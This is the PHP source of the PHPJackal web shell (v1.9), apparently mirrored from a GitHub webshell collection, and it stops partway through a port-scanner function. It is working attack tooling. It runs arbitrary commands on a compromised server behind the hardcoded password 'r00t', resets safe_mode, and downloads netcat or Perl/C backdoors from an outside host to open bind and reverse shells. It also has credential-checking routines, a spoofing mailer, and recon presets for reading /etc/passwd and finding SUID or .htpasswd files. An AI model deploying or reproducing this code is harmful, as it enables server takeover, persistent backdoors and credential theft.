mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
1583 lines
97 KiB
Text
1583 lines
97 KiB
Text
|
<?php
|
||
|
#--Config--#
|
||
|
$login_password='r00t';
|
||
|
#----------#
|
||
|
error_reporting(E_ALL);
|
||
|
ignore_user_abort(true);
|
||
|
set_time_limit(0);
|
||
|
ini_set('max_execution_time','0');
|
||
|
ini_set('memory_limit','9999M');
|
||
|
ini_set('output_buffering',0);
|
||
|
set_magic_quotes_runtime(0);
|
||
|
if(!isset($_SERVER))$_SERVER=&$HTTP_SERVER_VARS;
|
||
|
if(!isset($_POST))$_POST=&$HTTP_POST_VARS;
|
||
|
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
|
||
|
if(!isset($_COOKIE))$_COOKIE=&$HTTP_COOKIE_VARS;
|
||
|
if(!isset($_FILES))$_FILES=&$HTTP_POST_FILES;
|
||
|
$_REQUEST = array_merge($_GET,$_POST);
|
||
|
if(get_magic_quotes_gpc()){
|
||
|
foreach($_REQUEST as $key=>$value)$_REQUEST[$key]=stripslashes($value);
|
||
|
}
|
||
|
function hlinK($str=''){
|
||
|
$myvars=array('modE','chmoD','workingdiR','urL','cracK','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
|
||
|
$ret=$_SERVER['PHP_SELF'].'?';
|
||
|
$new=explode('&',$str);
|
||
|
foreach($_GET as $key => $v){
|
||
|
$add=1;
|
||
|
foreach($new as $m){
|
||
|
$el=explode('=',$m);
|
||
|
if($el[0]==$key)$add=0;
|
||
|
}
|
||
|
if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";}
|
||
|
}
|
||
|
$ret.=$str;
|
||
|
return $ret;
|
||
|
}
|
||
|
$et='</td></tr></table>';
|
||
|
if(!empty($login_password)){
|
||
|
if(!empty($_REQUEST['fpassw'])){
|
||
|
if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
|
||
|
header('Location: '.hlinK());
|
||
|
}
|
||
|
if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></form>$et</body></html>");
|
||
|
}
|
||
|
if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']);
|
||
|
$disablefunctions=ini_get('disable_functions');
|
||
|
$disablefunctions=explode(',',$disablefunctions);
|
||
|
function checkthisporT($ip,$port,$timeout,$type=0){
|
||
|
if(!$type){
|
||
|
$scan=fsockopen($ip,$port,$n,$s,$timeout);
|
||
|
if($scan){fclose($scan);return 1;}
|
||
|
}
|
||
|
elseif(function_exists('socket_set_timeout')){
|
||
|
$scan=fsockopen("udp://$ip",$port);
|
||
|
if($scan){
|
||
|
socket_set_timeout($scan,$timeout);
|
||
|
fwrite($scan,"\x00");
|
||
|
$s=time();
|
||
|
fread($scan,1);
|
||
|
if((time()-$s)>=$timeout){fclose($scan);return 1;}
|
||
|
}
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
if(!function_exists('file_get_contents')){
|
||
|
function file_get_contents($addr){
|
||
|
$a=fopen($addr,'r');
|
||
|
$tmp=fread($a,filesize($a));
|
||
|
fclose($a);
|
||
|
if($a)return $tmp;else return null;
|
||
|
}
|
||
|
}
|
||
|
if(!function_exists('file_put_contents')){
|
||
|
function file_put_contents($addr,$con){
|
||
|
$a=fopen($addr,'w');
|
||
|
if(!$a)return 0;
|
||
|
$t=fwrite($a,$con);
|
||
|
fclose($a);
|
||
|
if($t)return strlen($con);
|
||
|
return 0;
|
||
|
}
|
||
|
}
|
||
|
function file_add_contentS($addr,$con){
|
||
|
$a=fopen($addr,'a');
|
||
|
if(!$a)return 0;
|
||
|
fwrite($a,$con);
|
||
|
fclose($a);
|
||
|
return strlen($con);
|
||
|
}
|
||
|
if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
|
||
|
if(!empty($_REQUEST['downloaD'])){
|
||
|
ob_clean();
|
||
|
$dl=$_REQUEST['downloaD'];
|
||
|
$con=file_get_contents($dl);
|
||
|
header('Content-type: application/octet-stream');
|
||
|
header("Content-disposition: attachment; filename=\"$dl\";");
|
||
|
header('Content-length: '.strlen($con));
|
||
|
echo $con;
|
||
|
exit;
|
||
|
}
|
||
|
if(!empty($_REQUEST['imagE'])){
|
||
|
$img=$_REQUEST['imagE'];
|
||
|
header('Content-type: imagE/gif');
|
||
|
header("Content-length: ".filesize($img));
|
||
|
header("Last-Modified: ".date('r',filemtime($img)));
|
||
|
echo file_get_contents($img);
|
||
|
exit;
|
||
|
}
|
||
|
if(!empty($_REQUEST['exT'])){
|
||
|
$ex=$_REQUEST['exT'];
|
||
|
$e=get_extension_funcs($ex);
|
||
|
echo '<html><head><title>'.htmlspecialchars($ex).'</title></head><body><b>Functions:</b><br>';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo '<font color=red>DISABLED</font>';echo '<br>';}
|
||
|
echo '</body></html>';
|
||
|
exit;
|
||
|
}
|
||
|
header('Cache-Control: no-cache, must-revalidate');
|
||
|
header('Expires: Mon, 7 Aug 1987 05:00:00 GMT');
|
||
|
function showsizE($size){
|
||
|
if($size>=1073741824)$size=round(($size/1073741824),2).' GB';
|
||
|
elseif($size>=1048576)$size=round(($size/1048576),2).' MB';
|
||
|
elseif($size>=1024)$size=round(($size/1024),2).' KB';
|
||
|
else $size.=' B';
|
||
|
return $size;
|
||
|
}
|
||
|
$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;
|
||
|
$errorbox="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td><b>Error: </b>";
|
||
|
$v='1.9';
|
||
|
$cwd=getcwd();
|
||
|
$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td align='center'>";
|
||
|
$intro="<center><table border=0 style='border-collapse: collapse'><tr><td bgcolor='#666666'><b>Script:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href='http://netjackal.by.ru/' target='_blank'>http://netjackal.by.ru/</a><br><b>Email:</b> <a href='mailto:nima_501@yahoo.com?subject=PHPJackal'>nima_501@yahoo.com</a><br><noscript>".str_repeat('-=-',25)."<br><b>Error: Enable JavaScript in your browser!!!</b></noscript>$et</center>";
|
||
|
$footer="${msgbox}PHPJackal v$v - Powered By <a href='http://netjackal.by.ru/' target='_blank'>NetJackal</a>$et";
|
||
|
$hcwd="<input type=hidden name=workingdiR value='$cwd'>";
|
||
|
$t="<table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#333333'>";
|
||
|
$crack="</td><td bgcolor='#333333'></td></tr><form method='POST' name=form><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
|
||
|
function checkfunctioN($func){
|
||
|
global $disablefunctions,$safemode;
|
||
|
$safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
|
||
|
if($safemode=='ON' && in_array($func,$safe))return 0;
|
||
|
elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;
|
||
|
return 0;
|
||
|
}
|
||
|
function whereistmP(){
|
||
|
$uploadtmp=ini_get('upload_tmp_dir');
|
||
|
$uf=getenv('USERPROFILE');
|
||
|
$af=getenv('ALLUSERSPROFILE');
|
||
|
$se=ini_get('session.save_path');
|
||
|
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
|
||
|
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
|
||
|
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
|
||
|
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
|
||
|
if(is_dir($uf) && is_writable($uf))return $uf;
|
||
|
if(is_dir($af) && is_writable($af))return $af;
|
||
|
if(is_dir($se) && is_writable($se))return $se;
|
||
|
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
|
||
|
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
|
||
|
return '.';
|
||
|
}
|
||
|
function shelL($command){
|
||
|
global $windows;
|
||
|
$exec=$output='';
|
||
|
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
|
||
|
if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
|
||
|
elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
|
||
|
elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}
|
||
|
elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);
|
||
|
elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
|
||
|
elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
|
||
|
elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);
|
||
|
elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);
|
||
|
elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);
|
||
|
return $exec;
|
||
|
}
|
||
|
function getiT($get){
|
||
|
$fo=strtolower(ini_get('allow_url_fopen'));
|
||
|
$ui=strtolower(ini_get('allow_url_include'));
|
||
|
if($fo || $fo=='on')$con=file_get_contents($get);
|
||
|
elseif($ui || $ui=='on'){
|
||
|
ob_start();
|
||
|
include('http://netjackal.net/');
|
||
|
$con=ob_get_contents();
|
||
|
ob_end_clean();
|
||
|
}
|
||
|
else{
|
||
|
$u=parse_url($get);
|
||
|
$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];
|
||
|
$url=fsockopen($host,$port,$en,$es,12);
|
||
|
fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
|
||
|
$tmp=$con='';
|
||
|
while($tmp!="\r\n")$tmp=fgets($url);
|
||
|
while(!feof($url))$con.=fgets($url);
|
||
|
}
|
||
|
return $con;
|
||
|
}
|
||
|
function downloadiT($get,$put){
|
||
|
$con=getiT($get);
|
||
|
$mk=file_put_contents($put,$con);
|
||
|
if($mk)return 1;
|
||
|
return 0;
|
||
|
}
|
||
|
function winshelL($command){
|
||
|
$name=whereistmP()."\\".uniqid('NJ');
|
||
|
win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
|
||
|
sleep(1);
|
||
|
$exec=file_get_contents($name);
|
||
|
unlink($name);
|
||
|
return $exec;
|
||
|
}
|
||
|
function srvshelL($command){
|
||
|
$name=whereistmP()."\\".uniqid('NJ');
|
||
|
$n=uniqid('NJ');
|
||
|
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
|
||
|
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
|
||
|
win32_start_service($n);
|
||
|
win32_stop_service($n);
|
||
|
win32_delete_service($n);
|
||
|
sleep(1);
|
||
|
$exec=file_get_contents($name);
|
||
|
unlink($name);
|
||
|
return $exec;
|
||
|
}
|
||
|
function comshelL($command,$ws){
|
||
|
$exec=$ws->exec ("cmd.exe /c $command");
|
||
|
$so=$exec->StdOut();
|
||
|
return $so->ReadAll();
|
||
|
}
|
||
|
function smtpchecK($addr,$user,$pass,$timeout){
|
||
|
$sock=fsockopen($addr,25,$n,$s,$timeout);
|
||
|
if(!$sock)return -1;
|
||
|
fread($sock,1024);
|
||
|
fputs($sock,'ehlo '.uniqid('NJ')."\r\n");
|
||
|
$res=substr(fgets($sock,512),0,1);
|
||
|
if($res!='2')return 0;
|
||
|
fgets($sock,512);fgets($sock,512);fgets($sock,512);
|
||
|
fputs($sock,"AUTH LOGIN\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='334')return 0;
|
||
|
fputs($sock,base64_encode($user)."\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='334')return 0;
|
||
|
fputs($sock,base64_encode($pass)."\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='235')return 0;
|
||
|
return 1;
|
||
|
}
|
||
|
function mysqlchecK($host,$user,$pass,$timeout){
|
||
|
if(function_exists('mysql_connect')){
|
||
|
$l=mysql_connect($host,$user,$pass);
|
||
|
if($l)return 1;
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
function mssqlchecK($host,$user,$pass,$timeout){
|
||
|
if(function_exists('mssql_connect')){
|
||
|
$l=mssql_connect($host,$user,$pass);
|
||
|
if($l)return 1;
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
function checksmtP($host,$timeout){
|
||
|
$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';
|
||
|
$sock=fsockopen($host,25,$n,$s,$timeout);
|
||
|
if(!$sock)return -1;
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='220')return 0;
|
||
|
fputs($sock,'HELO '.uniqid('NJ')."\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='250')return 0;
|
||
|
fputs($sock,"MAIL FROM: <$from>\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='250')return 0;
|
||
|
fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='250')return 0;
|
||
|
fputs($sock,"DATA\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='354')return 0;
|
||
|
fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");
|
||
|
$res=substr(fgets($sock,512),0,3);
|
||
|
if($res!='250')return 0;
|
||
|
return 1;
|
||
|
}
|
||
|
function replace_stR($s,$h){
|
||
|
$ret=$h;
|
||
|
foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
|
||
|
return $ret;
|
||
|
}
|
||
|
function check_urL($url,$method,$search='200',$timeout=3){
|
||
|
$u=parse_url($url);
|
||
|
$method=strtoupper($method);
|
||
|
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];
|
||
|
$data=(!empty($u['query']))?$u['query']:'';
|
||
|
if(!empty($data))$data="?$data";
|
||
|
$sock=fsockopen($host,$port,$en,$es,$timeout);
|
||
|
if($sock){
|
||
|
fputs($sock,"$method $file$data HTTP/1.0\r\n");
|
||
|
fputs($sock,"Host: $host\r\n");
|
||
|
if($method=='GET')fputs($sock,"\r\n");
|
||
|
elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
|
||
|
else return 0;
|
||
|
if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}
|
||
|
while(!feof($sock)){
|
||
|
$res=fgets($sock);
|
||
|
if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
|
||
|
}
|
||
|
fclose($sock);
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
function get_sw_namE($host,$timeout){
|
||
|
$sock=fsockopen($host,80,$en,$es,$timeout);
|
||
|
if($sock){
|
||
|
$page=uniqid('NJ');
|
||
|
fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
|
||
|
while(!feof($sock)){
|
||
|
$con=fgets($sock);
|
||
|
if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
|
||
|
}
|
||
|
fclose($sock);
|
||
|
return -1;
|
||
|
}return 0;
|
||
|
}
|
||
|
function snmpchecK($ip,$com,$timeout){
|
||
|
$res=0;
|
||
|
$n=chr(0x00);
|
||
|
$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;
|
||
|
$sock=fsockopen("udp://$ip",161);
|
||
|
if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);
|
||
|
fputs($sock,$packet);
|
||
|
socket_set_timeout($sock,$timeout);
|
||
|
$res=fgets($sock);
|
||
|
fclose($sock);
|
||
|
if($res != '')return 1;else return 0;
|
||
|
}
|
||
|
$safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';
|
||
|
if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
|
||
|
function brshelL(){
|
||
|
global $errorbox,$windows,$et,$hcwd;
|
||
|
$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
|
||
|
$addr='http://netjackal.by.ru/br';
|
||
|
$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
|
||
|
$n=uniqid('NJ_');
|
||
|
if(!$windows)$n=".$n";
|
||
|
$d=whereistmP();
|
||
|
$name=$d.DIRECTORY_SEPARATOR.$n;
|
||
|
$c=($_REQUEST['C'])?1:0;
|
||
|
if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){
|
||
|
$port=(int)$_REQUEST['port'];
|
||
|
if($windows){
|
||
|
if($c){
|
||
|
$name.='.exe';
|
||
|
$bd=downloadiT("$addr/nc",$name);
|
||
|
shelL("attrib +H $name");
|
||
|
if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
|
||
|
}else{
|
||
|
$name=$name.'.pl';
|
||
|
$bd=downloadiT("$addr/winbind.p",$name);
|
||
|
shelL("attrib +H $name");
|
||
|
if(!$bd)echo $error;else shelL("perl $name $port");
|
||
|
}
|
||
|
}
|
||
|
else{
|
||
|
if($c){
|
||
|
$bd=downloadiT("$addr/bind.c",$name);
|
||
|
if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
|
||
|
}else{
|
||
|
$bd=downloadiT("$addr/bind.p",$name);
|
||
|
if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");
|
||
|
echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
|
||
|
$ip=$_REQUEST['ip'];
|
||
|
$port=(int)$_REQUEST['rport'];
|
||
|
if($windows){
|
||
|
if($c){
|
||
|
$name.='.exe';
|
||
|
$bd=downloadiT("$addr/nc",$name);
|
||
|
shelL("attrib +H $name");
|
||
|
if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
|
||
|
}else{
|
||
|
$name=$name.'.pl';
|
||
|
$bd=downloadiT("$addr/winrc.p",$name);
|
||
|
shelL("attrib +H $name");
|
||
|
if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");
|
||
|
}
|
||
|
}
|
||
|
else{
|
||
|
if($c){
|
||
|
$bd=downloadiT("$addr/rc.c",$name);
|
||
|
if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
|
||
|
}else{
|
||
|
$bd=downloadiT("$addr/rc.p",$name);
|
||
|
if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
|
||
|
}
|
||
|
}
|
||
|
echo '<font color=blue>Done!</font>';}
|
||
|
else{echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='50%' bgcolor='#333333'>Bind shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=port value=55501 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input type=submit class=buttons value=Bind></form>$et</td><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='40%' bgcolor='#333333'>Reverse shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#808080'>IP:</td><td bgcolor='#808080'><input type=text name=ip value=";echo $_SERVER['REMOTE_ADDR'];echo " size=17></td></tr><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=rport value=53 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et$et";}}
|
||
|
function showimagE($img){
|
||
|
echo "<center><img border=0 src='".hlinK("imagE=$img&&workingdiR=".getcwd())."'></center>";}
|
||
|
function editoR($file){
|
||
|
global $errorbox,$et,$hcwd,$cwd;
|
||
|
if(is_file($file)){
|
||
|
if(!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
|
||
|
if(!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
|
||
|
$data=file_get_contents($file);
|
||
|
echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'>$hcwd<input type=text value='".htmlspecialchars($file)."' size=75 name=file><input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='64'>";
|
||
|
echo htmlspecialchars($data);
|
||
|
echo "</textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$file' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
|
||
|
}
|
||
|
else {echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'><input type=text value='$cwd' size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='63'></textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$cwd' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
|
||
|
}
|
||
|
echo "$hcwd<input type=submit class=buttons name=Save value=Save></form>$et</center>";
|
||
|
}
|
||
|
function webshelL(){
|
||
|
global $windows,$hcwd,$et,$cwd;
|
||
|
if($windows){
|
||
|
$alias="<option value='netstat -an'>Display open ports</option><option value='tasklist'>List of processes</option><option value='systeminfo'>System information</option><option value='ipconfig /all'>IP configuration</option><option value='getmac'>Get MAC address</option><option value='net start'>Services list</option><option value='net view'>Machines in domain</option><option value='net user'>Users list</option><option value='shutdown -s -f -t 1'>Turn off the server</option>";
|
||
|
}
|
||
|
else{
|
||
|
$alias="<option value='netstat -an | grep -i listen'>Display open ports</option><option value='last -a -n 250 -i'>Show last 250 logged in users</option><option value='which wget curl lynx w3m'>Downloaders</option><option value='find / -perm -2 -type d -print'>Find world-writable directories</option><option value='find . -perm -2 -type d -print'>Find world-writable directories(in current directory)</option><option value='find / -perm -2 -type f -print'>Find world-writable files</option><option value='find . -perm -2 -type f -print'>Find world-writable files(in current directory)</option><option value='find / -type f -perm 04000 -ls'>Find files with SUID bit set</option><option value='find / -type f -perm 02000 -ls'>Find files with SGID bit set</option><option value='find / -name .htpasswd -type f'>Find .htpasswd files</option><option value='find / -type f -name .bash_history'>Find .bash_history files</option><option value='cat /etc/syslog.conf'>View syslog.conf</option><option value='cat cat /etc/hosts'>View hosts</option><option value='ps auxw'>List of processes</option>";
|
||
|
if(is_dir('/etc/valiases'))$alias.="<option value='ls -l /etc/valiases'>List of cPanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value='ls -l /etc/vdomainaliases'>List cPanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value='cat /var/cpanel/accounting.log'>Display cPanel`s log</option>";
|
||
|
if(is_dir('/var/spool/mail/'))$alias.="<option value='ls /var/spool/mail/'>Mailboxes list</option>";
|
||
|
}
|
||
|
echo "<center><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><form method='POST'><tr><td width='20%'><b>Location:</b><input type=text name=workingdiR size=82 value='$cwd'><input class=buttons type=submit value=Change></form>$et<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><tr><td><b>Web Shell:</b></td></tr><td bgcolor='#666666'><textarea rows='23' cols='79'>";
|
||
|
if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);
|
||
|
echo"</textarea></td></tr><form method=post><tr><td bgcolor='#808080'><input type=text size=91 name=cmd value='";if(!empty($_REQUEST['cmd']))echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows)echo "cat /etc/passwd";echo "'>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor='#808080'><select name='cmd' width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></form>$et</table><center>";
|
||
|
}
|
||
|
function maileR(){
|
||
|
global $msgbox,$et,$hcwd;
|
||
|
if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
|
||
|
$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
|
||
|
if(mail($to,$subject,$body,"From: $from"))echo "$msgbox<b>Mail sent!</b><br>$et";
|
||
|
}
|
||
|
echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'><td><b>Mailer:</b></td></tr><td width='20%' bgcolor='#666666'>SMTP</td><td bgcolor='#666666'>".ini_get('SMTP').' ('.ini_get('smtp_port').")</td></tr><tr><td bgcolor='#808080'>From:</td><td bgcolor='#808080'><input name=from type=text value='evil@hell.gov' size=55>$hcwd</td><tr><td width='25%' bgcolor='#666666'>To:</td><td bgcolor='#666666'><input name=to type=text value='";if(!empty($_ENV['SERVER_ADMIN']))echo $_ENV['SERVER_ADMIN'];else echo 'admin@'.getenv('HTTP_HOST'); echo "' size=55></td></tr><tr><td bgcolor='#808080'>Subject:</td><td bgcolor='#808080'><input name=subject type=text value='' size=55></td><tr><td bgcolor='#666666'>Body:</td><td bgcolor='#666666'><textarea rows='18' cols='43' name=body></textarea></td></tr><tr><td width='10%' bgcolor='#808080'></td><td bgcolor='#808080' align='right'><input type=submit class=buttons value=Send></form>$et";
|
||
|
}
|
||
|
function scanneR(){
|
||
|
global $hcwd,$et;
|
||
|
if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';
|
||
|
$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
|
||
|
if(($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
|
||
|
$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;
|
||
|
echo '<font color=blue>Port scanning started against '.htmlspecialchars($target).':<br>';
|
||
|
